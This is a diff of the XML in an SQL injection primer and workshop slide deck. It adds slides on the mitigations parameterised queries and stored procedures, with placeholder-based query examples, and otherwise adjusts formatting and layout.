       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="102" name="CustomShape 1"/>
+          <p:cNvPr id="104" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
@@ -5603,6 +5680,203 @@
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="105" name="TextShape 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4663440" y="1280160"/>
+            <a:ext cx="2695320" cy="331200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Parameterised Queries!</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="106" name="TextShape 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4846320" y="3566160"/>
+            <a:ext cx="4480560" cy="331200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Stored Procedures!</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="107" name="TextShape 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1920240" y="2011680"/>
+            <a:ext cx="9052560" cy="572040"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>run_query(‘select username, password from users where id = ?’, $username)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="108" name="TextShape 5"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1554480" y="2628360"/>
+            <a:ext cx="10058400" cy="572040"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>run_query(‘select username, password from users where id = :username:’, $username)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="109" name="TextShape 6"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3749040" y="4206240"/>
+            <a:ext cx="4846320" cy="572040"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>run_query(‘exec sp_get_user’, @username)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -5658,7 +5932,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="103" name="CustomShape 1"/>
+          <p:cNvPr id="110" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>

--- a/slides/SQLi-Preso.pptx
+++ b/slides/SQLi-Preso.pptx
@@ -17,6 +17,8 @@
     <p:sldId id="264" r:id="rId12"/>
     <p:sldId id="265" r:id="rId13"/>
     <p:sldId id="266" r:id="rId14"/>
+    <p:sldId id="267" r:id="rId15"/>
+    <p:sldId id="268" r:id="rId16"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="7772400" cy="10058400"/>
@@ -82,7 +84,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -193,7 +197,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -364,7 +370,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -617,7 +625,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -646,7 +656,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
@@ -697,7 +709,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -778,7 +792,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -889,7 +905,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -940,7 +958,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
@@ -991,7 +1011,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -1132,7 +1154,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -1161,7 +1185,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
@@ -1212,7 +1238,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -1353,7 +1381,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -1494,7 +1524,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -1605,7 +1637,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -1776,7 +1810,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -2007,7 +2043,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -2088,7 +2126,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -2199,7 +2239,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -2250,7 +2292,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
@@ -2301,7 +2345,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -2442,7 +2488,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -2583,7 +2631,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
@@ -2723,15 +2773,17 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10514880" cy="1324800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972080" cy="1144440"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
@@ -2758,7 +2810,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="609480" y="1604520"/>
-            <a:ext cx="10972440" cy="3977280"/>
+            <a:ext cx="10972080" cy="3976920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2781,12 +2833,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Click to edit the outline text format</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2803,12 +2855,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Second Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2825,12 +2877,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Third Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2847,12 +2899,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Fourth Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2869,12 +2921,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Fifth Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2891,12 +2943,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Sixth Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2913,12 +2965,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Seventh Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2988,7 +3040,9 @@
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:r>
@@ -3228,7 +3282,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="1523880" y="1122480"/>
-            <a:ext cx="9143280" cy="2386800"/>
+            <a:ext cx="9142920" cy="2386440"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3245,7 +3299,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr">
               <a:lnSpc>
@@ -3258,6 +3314,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>SQL Injection</a:t>
             </a:r>
@@ -3276,7 +3333,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="1523880" y="3602160"/>
-            <a:ext cx="9143280" cy="1654920"/>
+            <a:ext cx="9142920" cy="1654560"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3293,7 +3350,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr">
               <a:lnSpc>
@@ -3309,6 +3368,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Primer &amp; Workshop</a:t>
             </a:r>
@@ -3331,7 +3391,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="8229600" y="6208560"/>
-            <a:ext cx="3961800" cy="648720"/>
+            <a:ext cx="3961440" cy="648360"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3343,33 +3403,14 @@
       </p:pic>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="2" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -3392,14 +3433,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="111" name="CustomShape 1"/>
+          <p:cNvPr id="116" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3375720" y="1951920"/>
-            <a:ext cx="4748040" cy="2558880"/>
+            <a:off x="400680" y="246600"/>
+            <a:ext cx="3183840" cy="363960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3416,7 +3457,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -3431,167 +3474,257 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
-              <a:t>select workshop, url from workshops;</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>| Home.         | sqli.uid0.sh.       |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
